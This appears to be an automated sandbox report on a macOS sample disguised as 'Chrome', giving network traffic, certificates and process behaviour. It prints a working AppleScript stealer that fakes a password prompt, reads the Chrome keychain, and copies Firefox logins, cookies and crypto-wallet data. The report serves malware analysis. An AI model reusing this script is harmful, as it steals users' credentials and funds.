Mar 14, 2025 13:10:16.368242979 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.368695974 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.368710995 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.368899107 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.369587898 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.369757891 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.372148991 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.377429008 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.401338100 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.401355028 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.402113914 CET	49350	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.428493977 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.429219961 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.430131912 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.547645092 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.548883915 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.548923016 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.548981905 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.549027920 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.550052881 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.550126076 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.550383091 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.556819916 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.663232088 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.663249016 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.663777113 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.664061069 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.674390078 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.674577951 CET	443	49352	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.675086975 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.699017048 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.771733999 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.776151896 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.776396990 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.776494026 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.777513027 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.816508055 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.817198992 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.861574888 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.979146957 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.980355024 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:17.048100948 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:17.061724901 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.061733007 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.062025070 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.062776089 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.063113928 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.063365936 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.063373089 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.063378096 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.064469099 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.064646006 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.064646006 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.073159933 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.083228111 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.084357023 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.093233109 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.094068050 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.103285074 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.113373995 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.114149094 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.123457909 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.124377012 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.133435011 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.143620968 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.144597054 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.153548956 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.163537979 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.164212942 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.165582895 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:17.166057110 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:17.348587036 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.353634119 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.354305983 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.363708973 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.373568058 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.374494076 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.383557081 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.393697023 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.395159006 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:17.403620958 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:17.405174971 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:18.639266014 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:18.874691010 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:18.876328945 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:18.925153971 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:18.991956949 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:18.991967916 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:18.993227005 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:18.993227005 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:18.993377924 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:18.993866920 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:19.601519108 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:19.603684902 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:19.887309074 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:19.889374018 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:19.889586926 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:44.563577890 CET	49344	80	192.168.11.12	184.31.53.25
Mar 14, 2025 13:10:44.681241035 CET	80	49344	184.31.53.25	192.168.11.12
Mar 14, 2025 13:10:44.683089018 CET	49344	80	192.168.11.12	184.31.53.25
Mar 14, 2025 13:10:59.443049908 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.443140030 CET	443	49391	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.443720102 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.444665909 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.444719076 CET	443	49391	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.710525990 CET	443	49391	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.712315083 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.712496042 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.811923981 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.812035084 CET	443	49391	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.812185049 CET	443	49391	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.812685966 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.812794924 CET	49391	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.846337080 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.846366882 CET	443	49392	151.101.3.6	192.168.11.12
Mar 14, 2025 13:10:59.847026110 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.848082066 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:10:59.848094940 CET	443	49392	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.095143080 CET	443	49392	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.095935106 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.095993996 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.101613045 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.101838112 CET	443	49392	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.102344990 CET	443	49392	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.102524996 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.102807045 CET	49392	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.124536037 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.124620914 CET	443	49393	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.125195026 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.126497030 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.126549959 CET	443	49393	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.179436922 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.179548979 CET	443	49394	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.180162907 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.181173086 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.181229115 CET	443	49394	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.375427961 CET	443	49393	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.377322912 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.377367020 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.383764982 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.383936882 CET	443	49393	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.384314060 CET	443	49393	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.384494066 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.384700060 CET	49393	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.402122974 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.402219057 CET	443	49395	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.402847052 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.403656006 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.403709888 CET	443	49395	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.429733992 CET	443	49394	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.430715084 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.430773020 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.447793961 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.448031902 CET	443	49394	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.448481083 CET	443	49394	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.448611975 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.448837996 CET	49394	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.497436047 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.497546911 CET	443	49396	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.498166084 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.498935938 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.498990059 CET	443	49396	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.653004885 CET	443	49395	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.654916048 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.654972076 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.661484957 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.661628008 CET	443	49395	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.661995888 CET	443	49395	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.662271976 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.662559986 CET	49395	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.747970104 CET	443	49396	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.748727083 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.748769999 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.759886026 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.760145903 CET	443	49396	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.760600090 CET	443	49396	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:00.760760069 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:00.761101961 CET	49396	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:01.803924084 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:01.804033995 CET	443	49400	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:01.804899931 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:01.805875063 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:01.805927038 CET	443	49400	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:02.054383039 CET	443	49400	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:02.055551052 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:02.055612087 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:02.061244011 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:02.061486959 CET	443	49400	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:02.062009096 CET	443	49400	151.101.3.6	192.168.11.12
Mar 14, 2025 13:11:02.062097073 CET	49400	443	192.168.11.12	151.101.3.6
Mar 14, 2025 13:11:02.062582016 CET	49400	443	192.168.11.12	151.101.3.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 13:10:39.223273993 CET	53	56798	1.1.1.1	192.168.11.12

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Mar 14, 2025 13:10:16.271867990 CET	151.101.67.6	443	192.168.11.12	49350	CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020	Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030
Mar 14, 2025 13:10:16.271867990 CET	151.101.67.6	443	192.168.11.12	49350	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 29 14:54:50 CEST 2020	Thu Apr 11 01:59:59 CEST 2030
Mar 14, 2025 13:10:16.325517893 CET	17.248.195.72	443	192.168.11.12	49348	CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US	CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3	Mon Oct 28 07:43:49 CET 2024 Wed Dec 12 13:00:00 CET 2018 Mon Dec 18 22:12:39 CET 2023	Tue Nov 18 21:36:07 CET 2025 Wed Dec 11 13:00:00 CET 2030 Wed Dec 05 01:00:00 CET 2029
					CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US	CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Dec 12 13:00:00 CET 2018	Wed Dec 11 13:00:00 CET 2030
					CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US	C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3	Mon Dec 18 22:12:39 CET 2023	Wed Dec 05 01:00:00 CET 2029
Mar 14, 2025 13:10:16.368899107 CET	17.253.7.136	443	192.168.11.12	49351	CN=mesu.apple.com, O=Apple Inc., ST=California, C=US C=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1 CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	C=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1 CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon Mar 10 00:50:20 CET 2025 Wed Jun 19 02:00:00 CEST 2019 Thu Mar 06 01:00:00 CET 2008	Tue Dec 23 19:48:50 CET 2025 Thu Dec 05 00:59:59 CET 2030 Tue Jan 19 00:59:59 CET 2038	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
					C=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1	CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Jun 19 02:00:00 CEST 2019	Thu Dec 05 00:59:59 CET 2030
					CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Mar 06 01:00:00 CET 2008	Tue Jan 19 00:59:59 CET 2038
Mar 14, 2025 13:10:16.548981905 CET	151.101.67.6	443	192.168.11.12	49352	CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020	Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
Mar 14, 2025 13:10:16.548981905 CET	151.101.67.6	443	192.168.11.12	49352	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 29 14:54:50 CEST 2020	Thu Apr 11 01:59:59 CEST 2030		5c118da645babe52f060d0754256a73c

System Behavior

Analysis Process: xpcproxy PID: 612, Parent PID: 1

General

Start time (UTC):	12:10:14
Start date (UTC):	14/03/2025
Path:	/usr/libexec/xpcproxy
Arguments:	-
File size:	44048 bytes
MD5 hash:	4764d9eafe6b7dac23253a9f8b7f73d6

Start time (UTC):	12:10:14
Start date (UTC):	14/03/2025
Path:	/usr/libexec/nsurlstoraged
Arguments:	/usr/libexec/nsurlstoraged --privileged
File size:	246624 bytes
MD5 hash:	321b0a40e24b45f0af49ba42742b3f64

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
Arguments:	-
File size:	3722408 bytes
MD5 hash:	8910349f44a940d8d79318367855b236

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/Users/bernard/Desktop/Chrome
Arguments:	/Users/bernard/Desktop/Chrome
File size:	151280 bytes
MD5 hash:	72676069d026c215aef39c18314a2744

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/usr/bin/osascript
Arguments:	osascript -e tell application 'terminal' to set visible of the front window to false
File size:	43232 bytes
MD5 hash:	f13b7c85f3c1c08fae3b709a536281a1

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	12:10:21
Start date (UTC):	14/03/2025
Path:	/usr/bin/osascript
Arguments:	osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorreturn 'not found'end tryend GetUUIDon firewallets(firepath, savePath)tryset fire_wallets to {{'MetaMask', 'webextension@metamask.io\\\':\\\''}}repeat with wallet in fire_walletsset uuid to GetUUID(firepath & '/prefs.js', item 2 of wallet)if uuid is not 'not found' thenset walkpath to firepath & '/storage/default/'set fileList to list folder walkpath without invisiblesrepeat with currentItem in fileListif (currentItem contains uuid) and (currentItem contains 'userContext') thenset fwallet to walkpath & currentItem & '/idb/'set fileList_wallet to list folder fwallet without invisiblesrepeat with currentItem_wallet in fileList_walletif isDirectory(fwallet & currentItem_wallet) thenGrabFolder(fwallet & currentItem_wallet, savePath & '/' & item 1 of wallet & '/')end ifend repeatend ifend repeatend ifend repeatend tryend firewalletson parseFF(browsername, firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'gecko/' & browsername & '_' & currentItemfirewallets(firefox & currentItem, fpath)set readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' \| awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper. Please enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'ldinpeekobnhjjdofggfgjlcehhmanlj', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'jbkgjmpfammbgejcpedggoefddacbdia', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'nebnhfamliijlghikdgcigoebonmoibm', 'fdcnegogpncmfejlfnffnofpngdiejii', 'mfhbebgoclkghebffdldpobeajmbecfk', 'ffbceckpkpbcmgiaehlloocglmijnpmp', 'kfdniefadaanbjodldohaedphafoffoh', 'bedogdpgdnifilpgeianmmdabklhfkcn', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'opcgpfmipidbgpenhmajoajpbobppdil', 'mmmjbcfofconkannjonfmjjajpllddbg', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ejjladinnckdgjemekebdpeokbikhfci', 'kkpllkodjeloidieedojogacfhpaihoh', 'apnehcjmnengpnmccpaibjmhhoadaico', 'jiepnaheligkibgcjgjepjfppgbcghmp', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 